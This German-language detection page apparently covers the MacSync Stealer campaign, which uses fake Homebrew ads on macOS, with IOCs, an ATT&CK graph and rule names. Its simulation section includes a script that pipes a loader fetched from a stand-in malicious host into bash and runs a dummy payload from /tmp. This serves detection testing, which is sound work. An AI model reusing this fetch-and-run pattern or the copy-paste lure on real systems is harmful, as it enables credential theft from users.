Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Angreifer verwenden bösartige Suchanzeigen, um Benutzer auf eine gefälschte Homebrew-Website zu leiten, die macOS-Systeme mit dem MacSync Stealer ins Visier nimmt. Die gefälschte Seite weist die Opfer an, einen Shell-Befehl zu kopieren und auszuführen, der die Malware herunterlädt und startet. Sobald der Stealer aktiv ist, sammelt er Anmeldedaten und Systemdetails, komprimiert die gestohlenen Daten in ein ZIP-Archiv und sendet sie an einen Command-and-Control-Server. Die Kampagne unterstreicht die zunehmende Nutzung von Malvertising, um macOS-Nutzer zu kompromittieren.
Untersuchung
Der Analyst verfolgte den Angriff von der bösartigen Anzeige zu einer gefälschten Homebrew-Seite, die auf Google Sites gehostet wird. Diese Seite präsentierte einen zsh Befehl, der bei Ausführung zusätzliche Skripte von angriffsgeführter Infrastruktur herunterlud und ein temporäres ZIP-Archiv mit gesammelten Daten erstellte. Der Netzwerkverkehr bestätigte, dass das Archiv an die Domain glowmedaesthetics.comexfiltriert wurde. Forscher dokumentierten die relevanten Indikatoren, einschließlich URLs, Domains und Dateipfade, die mit der Infektionskette verbunden sind.
Minderung
Benutzer sollten es vermeiden, Befehle von nicht vertrauenswürdigen Websites zu kopieren und auszuführen und sollten die Legitimität von Paketmanager-Seiten überprüfen, bevor sie mit ihnen interagieren. Ad-Blocker oder sicherheitsorientierte Browsererweiterungen können helfen, die Exposition gegenüber bösartigen gesponserten Links zu reduzieren. Auf macOS sollte Gatekeeper aktiviert bleiben und die Ausführung von Anwendungen auf vertrauenswürdige, signierte Software beschränkt werden. Verteidiger sollten auch den ausgehenden Datenverkehr auf Verbindungen zu unbekannten Domains überwachen.
Reaktion
Sicherheitsteams sollten die Ausführung des verdächtigen zsh Befehls und jegliche curl -Aktivität, die die identifizierte bösartige URL erreicht, erkennen. Es sollten auch Warnungen für die Erstellung des /tmp/osalogging.zip Archivs und für ausgehenden Datenverkehr zu glowmedaesthetics.comgeneriert werden. Wenn eine Infektion vermutet wird, sollte das betroffene System isoliert, forensische Beweise gesammelt und alle kompromittierten Anmeldedaten zurückgesetzt werden.
"graph TB %% Class Definitions classDef technique fill:#99ccff %% Node definitions initial_malicious_link["<b>Technik</b> – <b>T1204.001 Bösartiger Link</b><br/><b>Beschreibung</b>: Opfer klickt auf eine bösartige URL in einer Anzeige und wird zu einer gefälschten Homebrew-Downloadseite geleitet."] class initial_malicious_link technique user_copy_paste["<b>Technik</b> – <b>T1204.004 Bösartiges Kopieren und Einfügen</b><br/><b>Beschreibung</b>: Opfer kopiert ein gestaltetes Skript von der Webseite und fügt es ins Terminal ein, um Angreifercode auszuführen."] class user_copy_paste technique unix_shell["<b>Technik</b> – <b>T1059.004 Unix Shell</b><br/><b>Beschreibung</b>: Zsh-Skript läuft, lädt weiteren Payload von glowmedaesthetics.com herunter."] class unix_shell technique gui_input_capture["<b>Technik</b> – <b>T1056.002 GUI-Eingabekapazität</b><br/><b>Beschreibung</b>: Gefälschte grafische Passwortaufforderung erfasst das macOS-Benutzerpasswort."] class gui_input_capture technique local_data_staging["<b>Technik</b> – <b>T1074.001 Lokale Datenbereitstellung</b><br/><b>Beschreibung</b>: Systeminformationen und Protokolle werden für die spätere Exfiltration in /tmp/osalogging.zip archiviert."] class local_data_staging technique exfiltration_c2["<b>Technik</b> – <b>T1041 Exfiltration über C2-Kanal</b><br/><b>Beschreibung</b>: Die ZIP-Datei wird über HTTPS zum C2-Server des Angreifers gesendet."] class exfiltration_c2 technique gather_software_info["<b>Technik</b> – <b>T1592.002 Software</b><br/><b>Beschreibung</b>: Skript listet installierte Software auf, um ein Inventar des Opferhosts zu erstellen."] class gather_software_info technique data_local_system["<b>Technik</b> – <b>T1005 Daten vom lokalen System</b><br/><b>Beschreibung</b>: Liest zusätzliche lokale Dateien, die im exfiltrierten Archiv enthalten sind."] class data_local_system technique %% Connections initial_malicious_link –>|leads_to| user_copy_paste user_copy_paste –>|leads_to| unix_shell unix_shell –>|leads_to| gui_input_capture gui_input_capture –>|leads_to| local_data_staging local_data_staging –>|leads_to| exfiltration_c2 local_data_staging –>|also leads_to| gather_software_info local_data_staging –>|also leads_to| data_local_system "
Angriffsablauf
Erkennungen
Mögliche Base64-codierte String-Manipulation [MacOS] (via cmdline)
Ansehen
Archiv wurde im temporären Ordner von MacOS erstellt (via file_event)
Ansehen
IOCs (HashSha256) zur Erkennung: Bösartige Anzeige für Homebrew führt zu MacSync Stealer
Ansehen
Erkennung der MacSync Stealer-Installation über gefälschte Homebrew-Seite [Linux Prozesserstellung]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Baseline-Vorflug-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die von der Erkennung erwartete Telemetrie genau zu erzeugen.
-
Angriffserzählung & Befehle:
-
Erste Köder: Das Opfer erhält eine Phishing-E-Mail mit einem Link zu einer gefälschten Homebrew-„Tap“-Seite, die ein bösartiges Installationsskript hostet.
-
Ausführung: Das Opfer kopiert den Einzeiler von der Seite und fügt ihn in ihr Terminal ein:
curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash- The
curlBinärdatei wird aufgerufen (entspricht der Regel).
- The
-
Downloader-Skript (
macsyncloader.sh):- Lädt den MacSync-Payload herunter über
curl. - Schreibt den Payload nach
/tmp/.macsyncund führt ihn aus. - Popupfenster mit dialogen zum Stehlen von Anmeldedaten (simuliert über
osascriptauf macOS, aber hier einfach echo).
- Lädt den MacSync-Payload herunter über
-
Persistenz: Das Skript registriert einen LaunchAgent, der beim Anmelden ausgeführt wird (außerhalb des Umfangs der aktuellen Regel, aber relevant für eine breitere Erkennung).
-
-
Regressionstest-Skript: Das folgende Bash-Skript reproduziert die genauen Schritte und stellt sicher, dass die Telemetrie mit der Erkennung übereinstimmt.
#!/usr/bin/env bash set -euo pipefail # ------------------------------------------------- # Simulierter, angreifergeführter Skript-Host # ------------------------------------------------- MALICIOUS_HOST="https://malicious.example.com" LOADER="${MALICIOUS_HOST}/macsyncloader.sh" # ------------------------------------------------- # Schritt 1: Herunterladen und Ausführen des bösartigen Loaders # ------------------------------------------------- echo "[*] Erkennungsregel auslösen, indem Curl aufgerufen wird ..." curl -fsSL "$LOADER" | /bin/bash # ------------------------------------------------- # Schritt 2: (Innerhalb des Loaders) – Simuliertes Payload # ------------------------------------------------- # Der Loader würde normalerweise vom Remote-Host abgerufen werden. # Für diesen Test binden wir das Payload direkt ein. cat <<'PAYLOAD' > /tmp/.macsync #!/usr/bin/env bash echo "MacSync-Payload ausgeführt – host-info wird exfiltriert ..." # Anmeldeinformationen simulieren (keine echten Daten) echo "Gesammelte Anmeldeinformationen: user@example.com / password123" PAYLOAD chmod +x /tmp/.macsync /tmp/.macsync echo "[*] Simulation abgeschlossen." -
Bereinigung der Befehle: Entfernen Sie Artefakte und beenden Sie alle fortbestehenden Prozesse.
#!/usr/bin/env bash set -euo pipefail echo "[*] Bereinigungsartefakte der Simulation ..." rm -f /tmp/.macsync # In diesem Test wurden keine persistenten Dienste erstellt echo "[*] Bereinigung abgeschlossen."